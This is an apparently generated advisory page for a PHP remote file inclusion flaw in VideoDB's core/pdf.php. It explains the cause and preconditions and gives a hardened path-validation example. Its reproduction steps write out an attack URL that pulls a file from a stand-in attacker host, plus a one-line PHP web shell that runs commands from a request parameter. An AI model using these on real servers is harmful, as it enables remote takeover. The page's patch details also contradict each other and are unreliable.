CVE-2006-5155
Description
PHP remote file inclusion vulnerability in core/pdf.php in VideoDB 2.2.1 and earlier allows remote attackers to execute arbitrary PHP code via the config[pdf_module] parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
Patches: 4
Vulnerability mechanics
Root cause
"Unvalidated user input passed to `define()` and `require_once` allows remote file inclusion."
Attack vector
An attacker sends an HTTP request to `core/pdf.php` with the `config[pdf_module]` parameter set to a URL pointing to a remote PHP shell. The script passes this user-supplied value directly into a `define()` call and then uses it in a `require_once` statement, causing PHP to include and execute the attacker's remote file. No authentication is required, and the only precondition is that the target server has `allow_url_include` enabled in PHP configuration [ref_id=1].
Affected code
The vulnerable file is `core/pdf.php` in VideoDB 2.2.1 and earlier. The exploit write-up [ref_id=1] shows that the script defines the `FPDF` constant from the unsanitized `$config['pdf_module']` value and then calls `require_once FPDF.'/fpdf.php'`, so whoever controls that parameter controls the path (or URL) that PHP includes.
What the fix does
No official patch is included in the bundle, and the advisory [ref_id=1] does not describe a fix. To remediate, the application should validate that `$config['pdf_module']` names a local module directory inside an expected base directory, rather than accepting an arbitrary URL or filesystem path. Disabling `allow_url_include` in the PHP configuration would also block this specific remote file inclusion vector, but on its own it does not stop the same parameter from pointing `require_once` at an arbitrary local file, so input validation is still needed.
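The following is an added example, not VideoDB's own code: it restates the include pattern the advisory describes as a comment, then shows one way to apply the remediation above. It assumes a hypothetical layout in which bundled PDF modules live under a `lib/` directory (for example `lib/fpdf/fpdf.php`); `resolve_pdf_module` is a hypothetical helper name.

```php
<?php
// Added example, not code from VideoDB. Assumes a hypothetical layout where
// PDF modules are shipped as subdirectories of lib/ (e.g. lib/fpdf/fpdf.php).

// --- Vulnerable pattern, as described in the advisory ---
// $config['pdf_module'] can be supplied by the request, so a URL (with
// allow_url_include on) or any local path ends up in the include:
//   define('FPDF', $config['pdf_module']);
//   require_once FPDF.'/fpdf.php';

// --- Hardened resolution ---
/**
 * Return the canonical directory of a bundled PDF module, or null when the
 * supplied value does not name a module inside $baseDir.
 */
function resolve_pdf_module(string $value, string $baseDir): ?string
{
    // Only a bare directory name is acceptable: no scheme, separator, or dots,
    // which rules out http://..., ../, and absolute paths in one check.
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $value)) {
        return null;
    }
    $base = realpath($baseDir);
    $candidate = realpath($baseDir . DIRECTORY_SEPARATOR . $value);
    if ($base === false || $candidate === false) {
        return null; // base directory or module directory does not exist
    }
    // The canonical path must stay inside the module directory; this also
    // catches a module name that is a symlink pointing elsewhere.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // The module must actually ship the expected entry file.
    if (!is_file($candidate . DIRECTORY_SEPARATOR . 'fpdf.php')) {
        return null;
    }
    return $candidate;
}

// Default to the bundled module when nothing (valid) is configured.
$requested = (string) ($config['pdf_module'] ?? 'fpdf');
$moduleDir = resolve_pdf_module($requested, __DIR__ . '/../lib');
if ($moduleDir === null) {
    http_response_code(400);
    exit('Unknown PDF module');
}
define('FPDF', $moduleDir);
require_once FPDF . '/fpdf.php';
```

Keeping `allow_url_include` off in `php.ini` remains a worthwhile second layer, since the validation above is what actually stops both the remote and the local variants of the include.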
Preconditions
- config: PHP's `allow_url_include` must be enabled on the target server
- auth: No authentication required; the vulnerable endpoint is publicly accessible
- network: Attacker must have network access to the target web server
- input: Attacker supplies the `config[pdf_module]` parameter via GET or POST
Reproduction
1. Identify a target running VideoDB 2.2.1 or earlier.
2. Send a request to `http://target/path/core/pdf.php?config[pdf_module]=http://attacker.com/shell.txt?` where `shell.txt` contains PHP code (e.g., `<?php passthru($_GET['cmd']);?>`).
3. The server will include and execute the remote file, allowing command execution via the `cmd` parameter [ref_id=1].
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
News mentions: 5
No linked articles in our index yet.